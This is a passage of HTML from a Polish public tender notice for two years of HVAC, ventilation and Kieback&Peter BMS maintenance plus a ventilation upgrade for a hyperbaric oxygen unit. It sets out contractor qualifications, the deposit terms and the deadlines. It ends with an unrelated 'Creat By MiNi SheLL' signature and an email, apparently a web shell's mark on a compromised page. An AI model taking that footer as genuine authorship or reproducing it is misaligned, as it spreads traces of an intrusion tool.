pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunek dotyczący zdolności technicznej lub zawodowej.<br/>Zamawiający uzna, iż wykonawca spełnia warunek dotyczący zdolności technicznej lub zawodowej, jeżeli wykonawca wykaże:<br/>1. doświadczenie, tj. wykonanie co najmniej jednej usługi przeglądów, konserwacji, naprawy instalacji i urządzeń klimatyzacyjnych, wentylacyjnych, automatyki oraz systemów zarządzania budynkami BMS produkcji KIEBACK&amp;PETER o wartości nie mniejszej niż 250.000,00 zł netto w okresie ostatnich 3 lat liczonych wstecz od dnia, w którym upływa terminu składania ofert;<br/>2. posiadanie certyfikatu w zakresie uprawnień f-gazowych wydanego na podstawie art. 30 ust. 7 ustawy z dnia 15 maja 2015 r. o substancjach zubożających warstwę ozonową oraz o niektórych fluorowanych gazach cieplarnianych (t.j. Dz. U. z 2020 r. poz. 2065) w zakresie instalacji, konserwacji lub serwisowania, naprawy i likwidacji stacjonarnych urządzeń chłodniczych, klimatyzacyjnych i pomp ciepła zawierającymi fluorowane gazy cieplarniane;<br/>3. posiadanie potencjału kadrowego tj.:<br/>3.1.	dysponowanie min. 5 osobami skierowanymi przez wykonawcę do realizacji zamówienia, posiadającymi uprawnienia w zakresie urządzeń, instalacji i sieci elektroenergetycznych o napięciu nie wyższym niż 1 kV oraz urządzeń wentylacji, klimatyzacji i chłodniczych, o mocy powyżej 50 kW (uprawnienia SEP typu D lub E)*;<br/>3.2.	min. 2 osób z kwalifikacjami w zakresie dozoru nad urządzeniami, instalacjami i sieciami elektroenergetycznymi o napięciu nie wyższym niż 1 kV oraz urządzeniami wentylacji, klimatyzacji i chłodniczymi o mocy powyżej 50kW (uprawnienia SEP typu D)*;<br/>3.3.	dysponowanie min. 5 osobami skierowanymi przez wykonawcę do realizacji zamówienia, posiadającymi uprawnienia w zakresie instalacji, konserwacji lub serwisowania, a także naprawy i likwidacji stacjonarnych urządzeń chłodniczych, klimatyzacyjnych i pomp ciepła zawierających fluorowane gazy cieplarniane lub substancje kontrolowane (imienne certyfikaty FGAZ kategorii I)*.<br/>* Jeżeli wykonawca dysponuje osobą posiadającą uprawnienia określone w pkt .3.1., pkt 3.2. i 3.3. Zamawiający uzna, że Wykonawca dysponuje osobą z uprawnieniami określonymi w pkt 3.1. oraz dysponuje osobą z uprawnieniami określonymi w pkt 3.2. oraz dysponuje osobą z uprawnieniami określonymi w pkt 3.3. W takim przypadku Wykonawca w załączniku nr 7 do SWZ i załączniku nr 8 do SWZ i załączniku nr 9 do SWZ zamieszcza informację o tej samej osobie, tj. że dysponuje osobą posiadającą uprawnienia określone w pkt 3.1. oraz dysponuje osobą posiadającą uprawnienia określone w pkt 3.2. oraz dysponuje osobą z uprawnieniami określonymi w pkt 3.3.<br/> <br/>Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych sytuacjach oraz <br/>w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych podmiotów udostępniających zasoby, niezależnie od charakteru prawnego łączących go z nimi stosunków prawnych.<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy mogą polegać na zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają usługi, do realizacji których te zdolności są wymagane.<br/>Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>Zobowiązanie podmiotu udostępniającego zasoby potwierdza, że stosunek łączący wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności:<br/>1)	zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>2)	sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>3)	czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje usługi, których wskazane zdolności dotyczą.<br/>Zamawiający ocenia, czy udostępniane wykonawcy przez podmioty udostępniające zasoby zdolności techniczne lub zawodowe, pozwalają na wykazanie przez wykonawcę spełniania warunków udziału w postępowaniu, a także bada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, które zostały przewidziane względem wykonawcy.<br/>Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności lub sytuację podmiotów udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on w danym zakresie na zdolnościach lub sytuacji podmiotów udostępniających zasoby. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawca, którego oferta zostanie najwyżej oceniona (przed wyborem najkorzystniejszej oferty), w celu potwierdzenia braku podstaw (przesłanek) wykluczenia z postępowania (określonych przez zamawiającego w Rozdziale 20 SWZ), na podstawie art. 274 ust. 1 ustawy Pzp zostanie wezwany do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, następujących aktualnych na dzień złożenia podmiotowych środków dowodowych:<br/>1.	oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz. U. z 2023 r. poz. 1689 z późn. zm.), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej <br/>(zgodnie z treścią załącznika nr 11 do SWZ);<br/>2.	oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w: <br/>a)	art. 108 ust. 1 pkt 1 ustawy Pzp, <br/>b)	art. 108 ust. 1 pkt 2 ustawy Pzp, <br/>c)	art. 108 ust. 1 pkt 3 ustawy Pzp, <br/>d)	art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczącej orzeczenia zakazu ubiegania się o zamówienia publiczne tytułem środka karnego,<br/>e)	art. 108 ust. 1 pkt 4 ustawy Pzp, dotyczącej orzeczenia zakazu ubiegania się o zamówienia publiczne tytułem środka zapobiegawczego, <br/>f)	art. 108 ust. 1 pkt 5 ustawy Pzp, dotyczących zawarcia z innymi Wykonawcami porozumienia mającego na celu zakłócenie konkurencji, <br/>g)	art. 108 ust. 1 pkt 6 ustawy Pzp,<br/>h)	art. 109 ust. 1 pkt 4 ustawy Pzp,<br/>i)	art. 109 ust. 1 pkt 5, 7, 8, 10 ustawy Pzp,<br/>j)	art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. z 2022 poz. 835) (zgodnie z treścią załącznika nr 11 do SWZ).<br/><br/>Zamawiający żąda od wykonawcy, który polega na zdolnościach technicznych lub zawodowych podmiotów udostępniających zasoby na zasadach określonych w art. 118 ustawy Pzp, przedstawienia podmiotowych środków dowodowych, o których mowa w pkt 2 powyżej, dotyczących tych podmiotów, potwierdzających, że nie zachodzą wobec tych podmiotów podstawy wykluczenia z postępowania (zgodnie z treścią załącznika nr 12 do SWZ).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawca, którego oferta zostanie najwyżej oceniona (przed wyborem najkorzystniejszej oferty), w celu potwierdzenia spełniania warunków udziału w postępowaniu (określonych przez zamawiającego w Rozdziale 21 SWZ), na podstawie art. 274 ust. 1 ustawy Pzp zostanie wezwany do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, następujących aktualnych na dzień złożenia podmiotowych środków dowodowych:<br/>-	wykazu dostaw lub usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy – potwierdzającego spełnienie warunku, o którym mowa w Rozdziale 21 pkt 21.1 SWZ (zgodnie z treścią załącznika nr 5 do SWZ);<br/>-	oświadczenia na temat wykształcenia i kwalifikacji zawodowych wykonawcy lub kadry kierowniczej wykonawcy – potwierdzającego spełnienie warunku, o którym mowa w Rozdziale 21 pkt 21.2 SWZ (zgodnie z treścią załącznika nr 6 do SWZ);<br/>-	wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, potwierdzającego spełnianie warunku, o którym mowa w Rozdziale 21 pkt 21.3.1, 21.3.2 i 21.3.3 (zgodnie z treścią załączników nr 7, 8 i 9 do SWZ).</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Ofertę składa się na Formularzu ofertowym zgodnie z załącznikiem nr 1 do SWZ.<br/>2. Oferta oraz wszystkie załączniki wymagają podpisu osoby/osób uprawnionych do reprezentowania Wykonawcy.<br/>3. W przypadku podpisywania oferty przez osobę/y niewskazane w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwo.<br/>4. Do oferty Wykonawca zobowiązany jest dołączyć oświadczenie o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu, w zakresie wskazanym w Rozdziałach 20 i 21 SWZ (załączniki nr 2 i 3 do SWZ), w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>5. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenia, o których mowa w pkt 4, składa każdy z wykonawców. Oświadczenia to potwierdzają brak podstaw wykluczenia oraz spełnienie warunków udziału w postępowaniu w zakresie w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>6.	Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniami, o których mowa w pkt 4, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby (załącznik nr 4 do SWZ). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga wniesienia wadium w wysokości 13 920,00 zł.<br/>Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach: <br/>1)	pieniądzu; <br/>2)	gwarancjach bankowych; <br/>3)	gwarancjach ubezpieczeniowych; <br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2023 r. poz. 462).<br/>Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp.<br/>Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem okresu ważności wadium albo, jeżeli nie jest to możliwe, z wniesieniem nowego wadium na przedłużony okres związania ofertą.<br/>Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy: <br/>ING BS O/Siemianowice 57 1050 1357 1000 0010 0156 5462 przy czym za termin wniesienia wadium wnoszonego w pieniądzu przyjmuje się termin uznania rachunku zamawiającego.<br/>Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt 2–4 powyżej, wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>Zamawiający zatrzymuje wadium wraz z odsetkami, a w przypadku wadium wniesionego w formie gwarancji lub poręczenia, <br/>o których mowa w pkt 2–4 powyżej, występuje odpowiednio do gwaranta lub poręczyciela z żądaniem zapłaty wadium, <br/>w sytuacjach określonych w art. 98 ust. 6 ustawy Pzp.<br/>Polisa, poręczenie, gwarancja lub inny dokument stanowiący formę wadium winien zawierać stwierdzenie, że na pierwsze pisemne żądanie zamawiającego wzywające do zapłaty kwoty wadium zgodnie z warunkami SWZ następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń ze strony gwaranta/poręczyciela.<br/>Zakazuje się wprowadzenie do gwarancji klauzul nakazujących zamawiającemu wykonanie określonych czynności lub ograniczających możliwość wypłaty na pierwsze żądanie kwoty stanowiącej wartość wadium, a w tym wymagających od Zamawiającego dokonywania opłat za potwierdzenie banku prowadzącego rachunek Zamawiającego, że podpisy złożone na żądaniu wypłaty należą do osób upoważnionych do składania oświadczeń woli w imieniu Zamawiającego. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2.	W przypadku, o którym mowa w pkt 1, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, załączając jednocześnie do oferty udzielone pełnomocnictwo.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy.<br/>4.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>5.	W przypadku, o którym mowa w pkt 4, wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia określono w projekcie umowy stanowiącym załącznik nr 10 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-10-23 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem zakładki „Oferty/wnioski”, widocznej w podglądzie postępowania po zalogowaniu się na konto Wykonawcy. Po wybraniu przycisku „Złóż ofertę” system prezentuje okno składania oferty umożliwiające przekazanie dokumentów elektronicznych, w którym znajdują się dwa pola drag&amp;drop („przeciągnij” i „upuść”) służące do dodawania plików. Szczegóły w Rozdziale 18 SWZ.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-10-23 08:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-11-15</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami, oraz informacje o wymaganiach technicznych i organizacyjnych sporządzania, wysyłania i odbierania korespondencji elektronicznej zawarto w Rozdziale 13 SWZ.<br/>2. Opis sposobu przygotowania oferty zawarto w Rozdziale 17 SWZ.<br/>3. Sposób składania ofert opisano w Rozdziale 18 SWZ.<br/>4. Informacje o formalnościach, jakie muszą zostać dopełnione po wyborze oferty w celu zawarcia umowy w sprawie zamówienia publicznego zawarto w Rozdziale 29 SWZ.<br/>5. Podstawy wykluczenia, w tym podstawy wykluczenia, o których mowa w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. poz. 835) opisano w Rozdziale 20 SWZ.<br/>6. Termin wykonania zamówienia:<br/>1). Stałe utrzymanie w ruchu instalacji i urządzeń klimatyzacyjnych, wentylacyjnych, automatyki oraz systemów zarządzania budynkami BMS produkcji KIEBACK&amp;PETER: 24 miesiące od daty zawarcia umowy.<br/>2).	Jednorazowa modernizacja części układów instalacji i urządzeń klimatyzacyjnych oraz centrali wentylacyjnej dla potrzeb pracowni Hiperbarii Tlenowej: 60 dni od dnia zawarcia umowy.

Creat By MiNi SheLL
Email: jattceo@gmail.com